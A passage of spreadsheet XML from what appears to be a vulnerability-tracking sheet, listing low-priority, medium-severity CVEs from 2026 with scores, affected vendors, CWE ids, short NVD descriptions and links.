      <c r="B4545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69679</t>
        </is>
      </c>
      <c r="C4545" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4545" s="5" t="inlineStr"/>
      <c r="F4545" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4545" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4545" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I4545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4545" s="5" t="inlineStr"/>
      <c r="K4545" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L4545" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M4545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t>
        </is>
      </c>
    </row>
    <row r="4546">
      <c r="A4546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69723</t>
        </is>
      </c>
      <c r="C4546" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4546" s="5" t="inlineStr"/>
      <c r="F4546" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G4546" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4546" s="5" t="inlineStr"/>
      <c r="I4546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4546" s="5" t="inlineStr"/>
      <c r="K4546" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4546" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t>
        </is>
      </c>
    </row>
    <row r="4547">
      <c r="A4547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70609</t>
        </is>
      </c>
      <c r="C4547" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4547" s="5" t="inlineStr"/>
      <c r="F4547" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4547" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H4547" s="5" t="inlineStr"/>
      <c r="I4547" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4547" s="5" t="inlineStr"/>
      <c r="K4547" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-94</t>
        </is>
      </c>
      <c r="L4547" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1, the mode option of webContents.openDevTools() was not sanitized before use by the DevTools frontend. If an attacker can influence this value, script under their control may run in the DevTools context, which in unsandboxed configurations has access to Node.js, including when untrusted input reaches the mode argument of openDevTools() or untrusted content calls openDevTools() on a webview it embeds. This issue is fixed in 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M4547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70609</t>
        </is>
      </c>
    </row>
    <row r="4548">
      <c r="A4548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73308</t>
        </is>
      </c>
      <c r="C4548" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4548" s="5" t="inlineStr"/>
      <c r="F4548" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4548" s="5" t="inlineStr"/>
      <c r="H4548" s="5" t="inlineStr"/>
      <c r="I4548" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4548" s="5" t="inlineStr"/>
      <c r="K4548" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4548" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.25, packages/server/src/api/controllers/automation.ts returned automation test results containing trigger.outputs.user.oauth2, broadcast BuilderSocketEvent.AutomationTestProgress to the app room, and stored progress in packages/server/src/automations/testProgress.ts without user scoping. A co-builder could receive or poll another SSO-authenticated builder test and obtain OAuth2 access and refresh tokens. The fix adds sanitizeAutomationTestResult and isolates progress by user. This issue is fixed in version 3.39.25.</t>
        </is>
      </c>
      <c r="M4548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73308</t>
        </is>
      </c>
    </row>
    <row r="4549">
      <c r="A4549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75808</t>
        </is>
      </c>
      <c r="C4549" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4549" s="5" t="inlineStr"/>
      <c r="F4549" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4549" s="5" t="inlineStr"/>
      <c r="H4549" s="5" t="inlineStr"/>
      <c r="I4549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4549" s="5" t="inlineStr"/>
      <c r="K4549" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4549" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t>
        </is>
      </c>
    </row>
    <row r="4550">
      <c r="A4550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75810</t>
        </is>
      </c>
      <c r="C4550" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4550" s="5" t="inlineStr"/>
      <c r="F4550" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4550" s="5" t="inlineStr"/>
      <c r="H4550" s="5" t="inlineStr"/>
      <c r="I4550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4550" s="5" t="inlineStr"/>
      <c r="K4550" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L4550" s="5" t="inlineStr">
        <is>
          <t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t>
        </is>
      </c>
    </row>
    <row r="4551">
      <c r="A4551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77698</t>
        </is>
      </c>
      <c r="C4551" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4551" s="5" t="inlineStr"/>
      <c r="F4551" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4551" s="5" t="inlineStr"/>
      <c r="H4551" s="5" t="inlineStr"/>
      <c r="I4551" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4551" s="5" t="inlineStr"/>
      <c r="K4551" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4551" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Endpoint Central versions before 11.5.2605.01 are vulnerable to local privilege escalation due to Agent upgrade.</t>
        </is>
      </c>
      <c r="M4551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77698</t>
        </is>
      </c>
    </row>
    <row r="4552">
      <c r="A4552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85788</t>
        </is>
      </c>
      <c r="C4552" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4552" s="5" t="inlineStr"/>
      <c r="F4552" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4552" s="5" t="inlineStr">
        <is>
          <t>mysql, aws</t>
        </is>
      </c>
      <c r="H4552" s="5" t="inlineStr"/>
      <c r="I4552" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4552" s="5" t="inlineStr"/>
      <c r="K4552" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L4552" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in the mutable SQL detector component in Amazon awslabs mysql-mcp-server might allow context-dependent actors to bypass the read-only enforcement gate and reach file-read and file-write SQL sinks via SQL inline comments that the regex engine does not treat as whitespace.
To remediate this issue, users should upgrade to version 1.0.23.</t>
        </is>
      </c>
      <c r="M4552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85788</t>
        </is>
      </c>
    </row>
    <row r="4553">
      <c r="A4553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88035</t>
        </is>
      </c>
      <c r="C4553" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4553" s="5" t="inlineStr"/>
      <c r="F4553" s="5" t="inlineStr"/>
      <c r="G4553" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4553" s="5" t="inlineStr"/>
      <c r="I4553" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4553" s="5" t="inlineStr"/>
      <c r="K4553" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4553" s="5" t="inlineStr">
        <is>
          <t>A size check in the client-side authentication path of the MongoDB C Driver can wrap around, so an unusually large user-name value is accepted and copied past the end of a small buffer. A party able to set the driver's connection settings may cause the application that embeds the driver to terminate unexpectedly. Reaching this code requires a build in which the optional external SASL authentication backend is present and a connection configured to use it.</t>
        </is>
      </c>
      <c r="M4553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88035</t>
        </is>
      </c>
    </row>
    <row r="4554">
      <c r="A4554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89157</t>
        </is>
      </c>
      <c r="C4554" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4554" s="5" t="inlineStr"/>
      <c r="F4554" s="5" t="inlineStr"/>
      <c r="G4554" s="5" t="inlineStr"/>
      <c r="H4554" s="5" t="inlineStr"/>
      <c r="I4554" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4554" s="5" t="inlineStr"/>
      <c r="K4554" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4554" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_pattern_convert out-of-bounds write when an attacker can provide a large pattern.</t>
        </is>
      </c>
      <c r="M4554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89157</t>
        </is>
      </c>
    </row>
    <row r="4555">
      <c r="A4555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0293</t>
        </is>
      </c>
      <c r="C4555" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4555" s="5" t="inlineStr"/>
      <c r="F4555" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4555" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H4555" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I4555" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4555" s="5" t="inlineStr"/>
      <c r="K4555" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L4555" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Palo Alto Networks Prisma® Access Agent on Windows enables a local attacker with administrator privileges to bypass the anti-tamper protection, enabling unauthorized access to protected processes and files.
The Prisma Access Agent on Linux, macOS, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M4555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0293</t>
        </is>
      </c>
    </row>
    <row r="4556">
      <c r="A4556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21093</t>
        </is>
      </c>
      <c r="C4556" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4556" s="5" t="inlineStr"/>
      <c r="F4556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4556" s="5" t="inlineStr"/>
      <c r="H4556" s="5" t="inlineStr"/>
      <c r="I4556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4556" s="5" t="inlineStr"/>
      <c r="K4556" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L4556" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in PROCA trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M4556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21093</t>
        </is>
      </c>
    </row>
    <row r="4557">
      <c r="A4557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53456</t>
        </is>
      </c>
      <c r="C4557" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4557" s="5" t="inlineStr"/>
      <c r="F4557" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4557" s="5" t="inlineStr"/>
      <c r="H4557" s="5" t="inlineStr"/>
      <c r="I4557" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4557" s="5" t="inlineStr"/>
      <c r="K4557" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L4557" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio terminal SSH key authentication in custom_components/blueprint_studio/backend/terminal_manager.py wrote SSH private-key material to a file under the Home Assistant configuration directory before applying restrictive permissions and relied on best-effort cleanup. The key could temporarily remain on disk and could persist if cleanup failed or Home Assistant crashed. A user or process with filesystem access to the Home Assistant configuration directory could obtain the residual private key. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M4557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53456</t>
        </is>
      </c>
    </row>
    <row r="4558">
      <c r="A4558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55663</t>
        </is>
      </c>
      <c r="C4558" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4558" s="5" t="inlineStr"/>
      <c r="F4558" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4558" s="5" t="inlineStr"/>
      <c r="H4558" s="5" t="inlineStr"/>
      <c r="I4558" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4558" s="5" t="inlineStr"/>
      <c r="K4558" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L4558" s="5" t="inlineStr">
        <is>
          <t>mediasoup is a WebRTC video conferencing system. From version 3.20.0 until 3.20.6 for the npm package and from 0.22.0 until 0.22.5 for the Rust crate, mediasoup's built-in SCTP stack authenticates state cookies using only the hardcoded msworker and 0xAD81 magic values instead of a per-instance secret and HMAC, contrary to RFC 9260 Section 5.1.3. The cookie structure and validation in worker/include/RTC/SCTP/association/StateCookie.hpp and worker/src/RTC/SCTP/association/StateCookie.cpp allow an on-path attacker targeting PlainTransport or PipeTransport with SCTP enabled and without DTLS protection to forge a COOKIE-ECHO whose packet verification tag matches the attacker-controlled localVerificationTag. The forged cookie passes StateCookie::IsMediasoupStateCookie() and Association::HandleReceivedCookieEchoChunk(), establishes an unauthorized SCTP association, and permits DataChannel message injection as a trusted peer. WebRtcTransport is not affected because its SCTP runs inside DTLS. This issue is fixed in npm version 3.20.6 and Rust crate version 0.22.5.</t>
        </is>
      </c>
      <c r="M4558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55663</t>
        </is>
      </c>
    </row>
    <row r="4559">
      <c r="A4559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66674</t>
        </is>
      </c>
      <c r="C4559" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4559" s="5" t="inlineStr"/>
      <c r="F4559" s="5" t="inlineStr"/>
      <c r="G4559" s="5" t="inlineStr"/>
      <c r="H4559" s="5" t="inlineStr"/>
      <c r="I4559" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4559" s="5" t="inlineStr"/>
      <c r="K4559" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L4559" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in Simple Cloudflare Turnstile &lt;= 1.42.1 versions.</t>
        </is>
      </c>
      <c r="M4559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66674</t>
        </is>
      </c>
    </row>
    <row r="4560">
      <c r="A4560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="C4560" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4560" s="5" t="inlineStr"/>
      <c r="F4560" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4560" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4560" s="5" t="inlineStr"/>
      <c r="I4560" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4560" s="5" t="inlineStr"/>
      <c r="K4560" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4560" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="4561">
      <c r="A4561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73647</t>
        </is>
      </c>
      <c r="C4561" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4561" s="5" t="inlineStr"/>
      <c r="F4561" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4561" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4561" s="5" t="inlineStr"/>
      <c r="I4561" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4561" s="5" t="inlineStr"/>
      <c r="K4561" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L4561" s="5" t="inlineStr">
        <is>
          <t>Quasar Framework is a framework for building high-performance Vue.js user interfaces. Prior to 2.22.0, the public extend() utility in ui/src/utils/extend/extend.js recursively copied attacker-controlled object keys during extend(true, target, source) deep merges without rejecting an own __proto__ property. The merge could descend into the prototype object and write attacker-controlled properties to Object.prototype in the same JavaScript process. Applications that passed user-controlled or partially user-controlled objects to extend() could experience logic bypass, unsafe default-option injection, denial of service, or other application-specific impact when polluted properties were later consumed. This issue is fixed in version 2.22.0.</t>
        </is>
      </c>
      <c r="M4561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73647</t>
        </is>
      </c>
    </row>
    <row r="4562">
      <c r="A4562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78043</t>
        </is>
      </c>
      <c r="C4562" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4562" s="5" t="inlineStr"/>
      <c r="F4562" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4562" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4562" s="5" t="inlineStr"/>
      <c r="I4562" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4562" s="5" t="inlineStr"/>
      <c r="K4562" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4562" s="5" t="inlineStr">
        <is>
          <t>The Windows Interactive Service in OpenVPN 2.7_alpha1 through 2.7.6 allows local authenticated users to bypass the trusted configuration directory constraint and load arbitrary configuration files via specially crafted paths</t>
        </is>
      </c>
      <c r="M4562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78043</t>
        </is>
      </c>
    </row>
    <row r="4563">
      <c r="A4563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78135</t>
        </is>
      </c>
      <c r="C4563" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4563" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4563" s="5" t="inlineStr"/>
      <c r="F4563" s="5" t="inlineStr"/>
      <c r="G4563" s="5" t="inlineStr"/>
      <c r="H4563" s="5" t="inlineStr"/>
      <c r="I4563" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4563" s="5" t="inlineStr"/>
      <c r="K4563" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="L4563" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 5.9.7 through 6.0.7 mishandles behavioral workflow in the IKEv2 state machine. Because CREATE_CHILD_SA requests are mishandled, there can be an authentication bypass.</t>
        </is>
      </c>
      <c r="M4563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78135</t>
        </is>
      </c>
    </row>
    <row r="4564">
      <c r="A4564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78629</t>
        </is>
      </c>
      <c r="C4564" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4564" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4564" s="5" t="inlineStr"/>
      <c r="F4564" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4564" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H4564" s="5" t="inlineStr"/>
      <c r="I4564" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4564" s="5" t="inlineStr"/>
      <c r="K4564" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L4564" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive agent plugin returns a success response without a signed SAML assertion when the organization's policy requires no MFA for a given user. The response contains only a bare boolean validation indicator with no cryptographic artifact, resulting in an unverifiable authentication verdict being delivered to the relying application.</t>
        </is>
      </c>
      <c r="M4564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t>
        </is>
      </c>
    </row>
    <row r="4565">
      <c r="A4565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79642</t>
        </is>
      </c>
      <c r="C4565" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4565" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4565" s="5" t="inlineStr"/>
      <c r="F4565" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4565" s="5" t="inlineStr"/>
      <c r="H4565" s="5" t="inlineStr"/>
      <c r="I4565" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4565" s="5" t="inlineStr"/>
      <c r="K4565" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4565"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4565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79642</t>
        </is>
      </c>
    </row>
    <row r="4566">
      <c r="A4566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79730</t>
        </is>
      </c>
      <c r="C4566" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4566" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4566" s="5" t="inlineStr"/>
      <c r="F4566" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4566" s="5" t="inlineStr"/>
      <c r="H4566" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4566" s="5" t="inlineStr"/>
